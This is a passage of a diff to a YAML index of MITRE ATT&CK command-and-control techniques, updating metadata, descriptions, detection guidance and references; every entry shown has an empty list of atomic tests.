-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37496,7 +37971,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -37527,7 +38001,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37547,8 +38021,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37570,8 +38044,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37633,7 +38105,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37681,7 +38152,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37735,7 +38205,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37768,7 +38237,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37788,8 +38257,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37827,7 +38294,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37855,42 +38322,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37899,17 +38346,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37941,7 +38410,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37958,8 +38427,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37979,7 +38446,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38002,8 +38469,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -38028,7 +38493,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38053,8 +38518,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -38119,7 +38582,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -38143,7 +38605,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38168,21 +38630,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -38201,7 +38678,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -38215,6 +38692,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38228,12 +38710,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38283,11 +38764,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38296,20 +38776,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -38334,17 +38814,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -38400,7 +38879,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -38425,7 +38903,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -38462,8 +38940,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -38517,7 +38993,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38589,33 +39064,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38623,23 +39077,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38686,7 +39178,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38746,7 +39237,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38778,7 +39268,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38804,8 +39294,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38872,7 +39360,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38970,7 +39457,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -39063,7 +39549,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -39087,7 +39572,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -39110,8 +39595,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -39136,7 +39619,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -39156,8 +39639,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -39211,7 +39692,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
